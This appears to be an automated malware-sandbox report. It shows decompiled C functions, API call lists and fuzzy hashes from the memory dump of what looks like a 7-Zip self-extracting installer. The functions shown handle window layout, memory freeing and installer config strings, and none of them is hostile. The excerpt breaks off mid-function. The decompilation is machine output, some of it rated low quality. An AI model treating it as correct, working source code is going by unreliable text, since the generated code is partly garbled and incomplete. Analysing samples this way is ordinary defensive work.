                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$??2@
                                          • String ID:
                                          • API String ID: 4113381792-0
                                          • Opcode ID: 0ba6d23056ac65c586b95b8a3b8a0767250d64f081be82bddb414f7d63c526b6
                                          • Instruction ID: 6abf9db5c8fa00cec55f169cb285ff9e288a09aa66c1a036a375ac4c588c175a
                                          • Opcode Fuzzy Hash: 0ba6d23056ac65c586b95b8a3b8a0767250d64f081be82bddb414f7d63c526b6
                                          • Instruction Fuzzy Hash: 01F106719002489FCB25DF69C9809EEBBF5BF48304F14442EF81997262DB38E995CF59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004189CE, Relevance: 18.0, APIs: 12, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E004189CE(void* __ecx) {
				void* _t24;

				_push( *((intOrPtr*)(__ecx + 0xd8)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xd0)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xc4)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xb8)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xac)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xa0)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x94)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x88)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x7c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x70)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x64)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x58)));
				L0041C160();
				_pop(_t30);
				_push( *((intOrPtr*)(__ecx + 0x4c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x3c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x38)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x34)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x30)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x2c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x24)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x18)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xc)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 8)));
				L0041C160();
				return _t24;
			}




                                          0x004189d2
                                          0x004189d8
                                          0x004189dd
                                          0x004189e3
                                          0x004189e8
                                          0x004189ee
                                          0x004189f3
                                          0x004189f9
                                          0x004189fe
                                          0x00418a04
                                          0x00418a09
                                          0x00418a0f
                                          0x00418a14
                                          0x00418a1a
                                          0x00418a1f
                                          0x00418a25
                                          0x00418a2a
                                          0x00418a2d
                                          0x00418a32
                                          0x00418a35
                                          0x00418a3a
                                          0x00418a3d
                                          0x00418a42
                                          0x00418a45
                                          0x00418a50
                                          0x004185d4
                                          0x004185d7
                                          0x004185dc
                                          0x004185df
                                          0x004185e4
                                          0x004185e7
                                          0x004185ec
                                          0x004185ef
                                          0x004185f4
                                          0x004185f7
                                          0x004185fc
                                          0x004185ff
                                          0x00418604
                                          0x00418607
                                          0x0041860c
                                          0x0041860f
                                          0x00418614
                                          0x00418617
                                          0x0041861c
                                          0x0041861f
                                          0x00418624
                                          0x00418627
                                          0x00418630

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 1f319bad1af196991e7fe3229c0439d54c27219e77e082c4970497211d54019c
                                          • Instruction ID: 0e0f50dce1b9974b6fb96937f2ede7be7b7889254afb23eb482ec8a91eb4f058
                                          • Opcode Fuzzy Hash: 1f319bad1af196991e7fe3229c0439d54c27219e77e082c4970497211d54019c
                                          • Instruction Fuzzy Hash: A3F068382D0B24BAD6223732DC42BDBB6B6AF40B08F00442FB19A604338DA57C919F5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040808C, Relevance: 16.6, APIs: 11, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0040808C(void* __edx, long _a4, int _a8, int _a12, int _a16) {
				struct tagRECT _v20;
				_Unknown_base(*)()* _t29;
				int _t34;
				struct HWND__* _t55;
				void* _t56;
				long _t57;
				struct HDC__* _t61;

				_t56 = __edx;
				_t55 = _a4;
				_t57 = GetWindowLongW(GetParent(_t55), 0xffffffeb);
				if(_t57 != 0) {
					_t29 =  *(_t57 + 0x54);
					_a4 = _a4 & 0x00000000;
					if(_t29 != 0) {
						_a4 = CallWindowProcW(_t29, _t55, _a8, _a12, _a16);
					}
					_a12 = GetSystemMetrics(0x31);
					_a16 = GetSystemMetrics(0x32);
					_t34 = _a8;
					if(_t34 == 0) {
						SetWindowLongW(_t55, 0xfffffffc,  *(_t57 + 0x54));
					} else {
						if(_t34 == 0xd) {
							_t61 = GetWindowDC(_t55);
							GetWindowRect(_t55,  &_v20);
							asm("cdq");
							asm("cdq");
							DrawIconEx(_t61, _v20.right - _v20.left - _a12 - _t56 >> 1, _v20.bottom - _v20.top - _a16 - _t56 >> 1,  *(_t57 + 0x50), _a12, _a16, 0, 0, 3);
							ReleaseDC(_t55, _t61);
						}
					}
					return _a4;
				}
				return DefWindowProcW(_t55, _a8, _a12, _a16);
			}










                                          0x0040808c
                                          0x00408093
                                          0x004080a7
                                          0x004080ab
                                          0x004080c2
                                          0x004080c5
                                          0x004080cb
                                          0x004080de
                                          0x004080de
                                          0x004080ee
                                          0x004080f3
                                          0x004080fa
                                          0x004080fb
                                          0x0040815a
                                          0x004080fd
                                          0x00408100
                                          0x00408109
                                          0x00408110
                                          0x00408128
                                          0x0040813d
                                          0x00408144
                                          0x0040814c
                                          0x0040814c
                                          0x00408100
                                          0x00000000
                                          0x00408163
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                          • String ID:
                                          • API String ID: 2586545124-0
                                          • Opcode ID: 58eddb4fd1200f8cdab970e24eaff4f37387fe116eb04ae65f16346c54bda7fc
                                          • Instruction ID: 5863647e7012f7e332d139e9621e2b3ca0e85c148ed14a4dd9622dae80b8943e
                                          • Opcode Fuzzy Hash: 58eddb4fd1200f8cdab970e24eaff4f37387fe116eb04ae65f16346c54bda7fc
                                          • Instruction Fuzzy Hash: A6310CB690060ABFDB019FB8DE48EDF3B69FB08351F008525FA51E6190CB74D920CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004185D1, Relevance: 16.5, APIs: 11, Instructions: 27COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 40%
                                          			E004185D1(void* __ecx) {
				void* _t12;

				_push( *((intOrPtr*)(__ecx + 0x4c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x3c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x38)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x34)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x30)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x2c)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x28)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x24)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0x18)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 0xc)));
				L0041C160();
				_push( *((intOrPtr*)(__ecx + 8)));
				L0041C160();
				return _t12;
			}




                                          0x004185d4
                                          0x004185d7
                                          0x004185dc
                                          0x004185df
                                          0x004185e4
                                          0x004185e7
                                          0x004185ec
                                          0x004185ef
                                          0x004185f4
                                          0x004185f7
                                          0x004185fc
                                          0x004185ff
                                          0x00418604
                                          0x00418607
                                          0x0041860c
                                          0x0041860f
                                          0x00418614
                                          0x00418617
                                          0x0041861c
                                          0x0041861f
                                          0x00418624
                                          0x00418627
                                          0x00418630

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 3dccb71c9ef2e60c5503e6c0d19253dcb49cd942d4fb101ec1a1f6589c8e82c3
                                          • Instruction ID: 86688c80c3d54f4c5222143b6f6a850776599fc5e0b6a98af45a6b574340ef54
                                          • Opcode Fuzzy Hash: 3dccb71c9ef2e60c5503e6c0d19253dcb49cd942d4fb101ec1a1f6589c8e82c3
                                          • Instruction Fuzzy Hash: 84F0D9355D1524BECB623B23DD829877AB2BF04B18350552EB04610833DA967CE19E4C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004094E2, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004094E2(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				int _v20;
				int _v24;
				intOrPtr _v32;
				char _v40;
				void* _t44;

				_t44 = __ecx;
				E00409190(__ecx, __edx, __eflags);
				E004079B7(_t44, 0x4b7, 0);
				E00407925(_t44, 0x4b7,  &_v40);
				E00407925(_t44, 0x4b7,  &_v24);
				DestroyWindow(GetDlgItem( *(_t44 + 4), 0x4b7));
				CreateWindowExA(0x200, "Edit", 0x41de2a, 0x500100a0, _v24, _v20, _v32 - _v24, _v12 - _v20,  *(_t44 + 4), 0x4b7, 0, 0);
				_v8 = SendMessageW( *(_t44 + 4), 0x31, 0, 0);
				SendMessageW(GetDlgItem( *(_t44 + 4), 0x4b7), 0x30, _v8, 1);
				SetFocus(GetDlgItem( *(_t44 + 4), 0x4b6));
				return 0;
			}










                                          0x004094eb
                                          0x004094ed
                                          0x004094fc
                                          0x00409508
                                          0x00409515
                                          0x00409527
                                          0x0040955d
                                          0x00409577
                                          0x00409584
                                          0x00409591
                                          0x0040959d

                                          APIs
                                            • Part of subcall function 00409190: memset.MSVCRT ref: 004091E2
                                            • Part of subcall function 00409190: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004091F6
                                            • Part of subcall function 00409190: SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 00409216
                                            • Part of subcall function 00409190: GetDlgItem.USER32 ref: 00409229
                                            • Part of subcall function 00409190: SetWindowLongW.USER32 ref: 00409237
                                            • Part of subcall function 004079B7: GetDlgItem.USER32 ref: 004079C4
                                            • Part of subcall function 004079B7: ShowWindow.USER32(00000000,?), ref: 004079DB
                                            • Part of subcall function 00407925: GetDlgItem.USER32 ref: 0040792D
                                          • GetDlgItem.USER32 ref: 00409524
                                          • DestroyWindow.USER32(00000000), ref: 00409527
                                          • CreateWindowExA.USER32 ref: 0040955D
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040956D
                                          • GetDlgItem.USER32 ref: 0040957A
                                          • SendMessageW.USER32(00000000,00000030,?,00000001), ref: 00409584
                                          • GetDlgItem.USER32 ref: 0040958E
                                          • SetFocus.USER32(00000000), ref: 00409591
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystemmemset
                                          • String ID: Edit
                                          • API String ID: 1904772019-554135844
                                          • Opcode ID: fa5d6b11f3bfb7040f8905d8716a38a91aa73369538ddbddf177dea4798fc51b
                                          • Instruction ID: 0e6a47c8423b62f02d93f4ef7a6912530f49f9b8c415eb71875aef5ea39149c2
                                          • Opcode Fuzzy Hash: fa5d6b11f3bfb7040f8905d8716a38a91aa73369538ddbddf177dea4798fc51b
                                          • Instruction Fuzzy Hash: 17112475E00318BBEB11ABE5CD49FAFBBBDEF89B04F104419B611B6190C675ED008729
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409777, Relevance: 15.1, APIs: 10, Instructions: 97COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00409777(void* __ecx, void* __edx, void* __eflags) {
				struct HWND__* _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				struct HWND__* _t55;
				void* _t71;

				_t71 = __ecx;
				_v12 = E00408E57(__edx);
				E004079B7(__ecx, 0x4b3, 0);
				E004079B7(__ecx, 0x4b4, 0);
				E00407925(__ecx, 0x4b3,  &_v36);
				_v20.x = _v36.left;
				_v20.y = _v36.top;
				ClientToScreen( *(_t71 + 4),  &_v20);
				GetWindowRect( *(_t71 + 4),  &_v36);
				SetWindowPos( *(_t71 + 4), 0, 0, 0, _v36.right - _v36.left, _v20.y - _v36.top, 6);
				SetWindowLongW( *(_t71 + 4), 0xfffffff0, 0x800000);
				SetWindowLongW( *(_t71 + 4), 0xffffffec, 8);
				GetWindowRect( *(_t71 + 4),  &_v36);
				E00407AA0(_t71, 0x4b2, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top, 4);
				_v8 = GetDlgItem( *(_t71 + 4), 0x4b2);
				_t55 = GetDlgItem( *(_t71 + 4), 0x4b2);
				SetWindowLongW(_t55, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) | 0x10000201);
				return _v12;
			}









                                          0x00409780
                                          0x00409792
                                          0x00409795
                                          0x004097a2
                                          0x004097ae
                                          0x004097b6
                                          0x004097bc
                                          0x004097c6
                                          0x004097d9
                                          0x004097f1
                                          0x00409807
                                          0x00409810
                                          0x00409819
                                          0x00409837
                                          0x0040984a
                                          0x0040984d
                                          0x00409869
                                          0x00409872

                                          APIs
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00409247), ref: 00408E81
                                            • Part of subcall function 00408E57: LoadIconW.USER32(00000000), ref: 00408E84
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E98
                                            • Part of subcall function 00408E57: GetSystemMetrics.USER32 ref: 00408E9D
                                            • Part of subcall function 00408E57: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00409247), ref: 00408EA6
                                            • Part of subcall function 00408E57: LoadImageW.USER32 ref: 00408EA9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408EC9
                                            • Part of subcall function 00408E57: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408ED2
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EEF
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408EF9
                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(?,000000F0), ref: 00408F05
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F14
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F22
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F30
                                            • Part of subcall function 00408E57: GetWindowLongW.USER32(000000F0,000000F0), ref: 00408F3C
                                            • Part of subcall function 00408E57: SetWindowLongW.USER32 ref: 00408F4B
                                            • Part of subcall function 00408E57: GetDlgItem.USER32 ref: 00408F58
                                            • Part of subcall function 004079B7: GetDlgItem.USER32 ref: 004079C4
                                            • Part of subcall function 004079B7: ShowWindow.USER32(00000000,?), ref: 004079DB
                                            • Part of subcall function 00407925: GetDlgItem.USER32 ref: 0040792D
                                          • ClientToScreen.USER32(?,?), ref: 004097C6
                                          • GetWindowRect.USER32 ref: 004097D9
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 004097F1
                                          • SetWindowLongW.USER32 ref: 00409807
                                          • SetWindowLongW.USER32 ref: 00409810
                                          • GetWindowRect.USER32 ref: 00409819
                                            • Part of subcall function 00407AA0: GetDlgItem.USER32 ref: 00407ABE
                                            • Part of subcall function 00407AA0: SetWindowPos.USER32(00000000), ref: 00407AC5
                                          • GetDlgItem.USER32 ref: 00409840
                                          • GetDlgItem.USER32 ref: 0040984D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040985A
                                          • SetWindowLongW.USER32 ref: 00409869
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$Item$Long$HandleLoadMessageMetricsModuleRectSendSystem$ClientIconImageScreenShow
                                          • String ID:
                                          • API String ID: 1121484998-0
                                          • Opcode ID: b58d5cfabe8e3f54eea926d8a5a69caf2518092f248e1b15b4c7d120cae08dd2
                                          • Instruction ID: eb4d2fabcb322e020ba9bdcc7ca5b571507892158c3f3be7d1bbc3ef01ce0d5d
                                          • Opcode Fuzzy Hash: b58d5cfabe8e3f54eea926d8a5a69caf2518092f248e1b15b4c7d120cae08dd2
                                          • Instruction Fuzzy Hash: F231E3B1900619BFDF10DBA9CD45EAFBBBDFB48710F104529F525F2291CB74A9008B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004099C9, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E004099C9(intOrPtr* __eax, void* __edx, void* __eflags) {
				signed int _v8;
				char _v20;
				char _v32;
				char _v44;
				char _v56;
				signed int _t34;
				intOrPtr _t37;
				void* _t50;
				signed int _t57;
				signed int _t58;
				short* _t61;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;
				void* _t86;

				_t84 = __eax;
				E004148C7(__eax, 0x422844);
				_t34 = E0040990C(0x41f004, _t84);
				_v8 = _t34;
				if(_t34 <= 0) {
					L8:
					return _t34 | 0xffffffff;
				}
				_t61 =  *_t84 + _t34 * 2;
				if( *_t61 != 0x2e) {
					goto L8;
				}
				 *(_t84 + 4) = _t34;
				 *_t61 = 0;
				_t37 =  *0x42276c; // 0x0
				_push(_t84);
				if(_t37 == 1) {
					_t57 = E0040990C(0x41f004);
					if(_t57 < 0) {
						L17:
						return 1;
					}
					_t82 = _t57 + _t57;
					_t44 =  *_t84 + _t82;
					if( *((short*)( *_t84 + _t82)) != 0x2e || _v8 - _t57 != 4) {
						goto L17;
					} else {
						E00414660( &_v56, 2, _t44 + 2);
						E00414803( &_v32, _v56);
						_push(_v56);
						L0041C160();
						if(E00409873( &_v32, 0x41effc) == 0) {
							_push(_v32);
							L0041C160();
							goto L17;
						}
						 *(_t84 + 4) = _t57;
						 *((short*)(_t82 +  *_t84)) = 0;
						_t50 = _t82 +  *_t84 + 2;
						__imp___wtol(_t50);
						_push(_v32);
						L15:
						_t86 = _t50;
						L0041C160();
						_t29 = _t86 + 1; // 0x1
						return _t29;
					}
				}
				_t34 = E0040990C(0x41f004);
				_t58 = _t34;
				if(_t58 <= 0) {
					goto L8;
				}
				_t83 = _t58 + _t58;
				_t34 =  *_t84 + _t83;
				if( *_t34 != 0x2e) {
					goto L8;
				}
				E00414660( &_v44, 2, _t34 + 2);
				E00414803( &_v20, _v44);
				_push(_v44);
				L0041C160();
				_t34 = E00409873( &_v20, 0x41effc);
				if(_t34 == 0) {
					_push(_v20);
					L0041C160();
					goto L8;
				}
				 *(_t84 + 4) = _t58;
				 *((short*)(_t83 +  *_t84)) = 0;
				_t50 = _t83 +  *_t84 + 2;
				__imp___wtol(_t50);
				_push(_v20);
				goto L15;
			}


















                                          0x004099d2
                                          0x004099db
                                          0x004099e8
                                          0x004099ed
                                          0x004099f2
                                          0x00409a8e
                                          0x00000000
                                          0x00409a8e
                                          0x004099fa
                                          0x00409a01
                                          0x00000000
                                          0x00000000
                                          0x00409a07
                                          0x00409a0c
                                          0x00409a0f
                                          0x00409a15
                                          0x00409a18
                                          0x00409a9b
                                          0x00409a9f
                                          0x00409b20
                                          0x00000000
                                          0x00409b22
                                          0x00409aa3
                                          0x00409aa6
                                          0x00409aac
                                          0x00000000
                                          0x00409ab8
                                          0x00409ac1
                                          0x00409acc
                                          0x00409ad1
                                          0x00409ad4
                                          0x00409ae9
                                          0x00409b17
                                          0x00409b1a
                                          0x00000000
                                          0x00409b1f
                                          0x00409aed
                                          0x00409af2
                                          0x00409af8
                                          0x00409afd
                                          0x00409b03
                                          0x00409b06
                                          0x00409b06
                                          0x00409b08
                                          0x00409b0f
                                          0x00000000
                                          0x00409b0f
                                          0x00409aac
                                          0x00409a1a
                                          0x00409a1f
                                          0x00409a23
                                          0x00000000
                                          0x00000000
                                          0x00409a27
                                          0x00409a2a
                                          0x00409a30
                                          0x00000000
                                          0x00000000
                                          0x00409a3b
                                          0x00409a46
                                          0x00409a4b
                                          0x00409a4e
                                          0x00409a5c
                                          0x00409a63
                                          0x00409a85
                                          0x00409a88
                                          0x00000000
                                          0x00409a8d
                                          0x00409a67
                                          0x00409a6c
                                          0x00409a72
                                          0x00409a77
                                          0x00409a7d
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409A4E
                                          • _wtol.MSVCRT(?,?,00000002,-00000002,?,?,00422844,00000000), ref: 00409A77
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409A88
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AD4
                                          • _wtol.MSVCRT(?,?,00000002,-00000002,?,?,00422844,00000000), ref: 00409AFD
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409B08
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00409B1A
                                            • Part of subcall function 00414660: memcpy.MSVCRT ref: 0041468E
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy$_wtol$??2@
                                          • String ID: .\/
                                          • API String ID: 211236615-1884134905
                                          • Opcode ID: e4dd5e0f757c21e4c2822975ddfe278b441f20d1ef89bd084ebe2692a3c13073
                                          • Instruction ID: 2f426bf7fcc050e2f2ccbb6fef500bcc126e9f0fd43eeb082ec496173bf80244
                                          • Opcode Fuzzy Hash: e4dd5e0f757c21e4c2822975ddfe278b441f20d1ef89bd084ebe2692a3c13073
                                          • Instruction Fuzzy Hash: 2D41A332A00215ABCB25EF65EC419AAB7B5FF44318710443FE452A7292EB78AC41CB5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403F60, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00403F60(intOrPtr __ecx, char* __edx, intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				intOrPtr _v12;
				char _v24;
				char _v124;
				char* _t41;
				void* _t68;

				_t67 = _a4;
				_v12 = __ecx;
				_v8 = __edx;
				E00414427(_a4, ";!@Install@!UTF-8!");
				_t66 = _a8;
				E00414427(_a8, ";!@InstallEnd@!");
				E0041438B( &_v24,  *((intOrPtr*)(_t67 + 4)) - 1, _t67);
				E00414427(_t67, _v24);
				_push(_v24);
				L0041C160();
				E0041438B( &_v24,  *((intOrPtr*)(_t66 + 4)) - 1, _t66);
				E00414427(_t66, _v24);
				_push(_v24);
				L0041C160();
				if(_v8 != 0) {
					_t41 = _v8;
					if( *_t41 != 0) {
						wsprintfA( &_v124, ":%hs", _t41);
						_t68 = _t68 + 0xc;
						E004144C5(_t67,  &_v124);
						E004144C5(_t66,  &_v124);
					}
				}
				if(_v12 != 0) {
					wsprintfA( &_v124, ":Language:%u", _v12);
					E004144C5(_t67,  &_v124);
					E004144C5(_t66,  &_v124);
				}
				_t49 = "!";
				E004144C5(_t67, "!");
				return E004144C5(_t66, _t49);
			}









                                          0x00403f68
                                          0x00403f6c
                                          0x00403f76
                                          0x00403f79
                                          0x00403f7e
                                          0x00403f88
                                          0x00403f96
                                          0x00403fa0
                                          0x00403fa5
                                          0x00403fa8
                                          0x00403fb7
                                          0x00403fc1
                                          0x00403fc6
                                          0x00403fc9
                                          0x00403fd9
                                          0x00403fdb
                                          0x00403fe1
                                          0x00403fed
                                          0x00403fef
                                          0x00403ff8
                                          0x00404003
                                          0x00404003
                                          0x00403fe1
                                          0x0040400c
                                          0x0040401a
                                          0x00404025
                                          0x00404030
                                          0x00404030
                                          0x00404035
                                          0x0040403d
                                          0x0040404e

                                          APIs
                                            • Part of subcall function 00414427: ??2@YAPAXI@Z.MSVCRT ref: 00414449
                                            • Part of subcall function 00414427: ??3@YAXPAX@Z.MSVCRT ref: 00414453
                                            • Part of subcall function 0041438B: memcpy.MSVCRT ref: 004143AC
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403FA8
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403FC9
                                          • wsprintfA.USER32 ref: 00403FED
                                          • wsprintfA.USER32 ref: 0040401A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.708893020.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000D.00000002.708888095.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708910578.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708919422.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000D.00000002.708925367.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$wsprintf$??2@memcpy
                                          • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
                                          • API String ID: 1376779256-695273242
                                          • Opcode ID: ffccc149b743fa680d0eb0769d88808ab5d885dbcf21d5ceae07064466338ad7
                                          • Instruction ID: 55619282d89a0695e4f6350effc0af897ba8d8e27976df9351510ece20a97bca
                                          • Opcode Fuzzy Hash: ffccc149b743fa680d0eb0769d88808ab5d885dbcf21d5ceae07064466338ad7
                                          • Instruction Fuzzy Hash: 2A218571A00118ABCB05EBA5D882EEEB77DDF84305F24411FF505B3182CB7C5E848BA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407790, Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00407790(void* __ecx, int _a4) {
				void* _t21;

				_t21 = __ecx;
				SendMessageW(GetDlgItem( *(__ecx + 4), 0x4b3), 0xf4, 0, 1);
				SendMessageW(GetDlgItem( *(_t21 + 4), 0x4b4), 0xf4, 0, 1);
				SendMessageW( *(_t21 + 4), 0x401, _a4, 0);
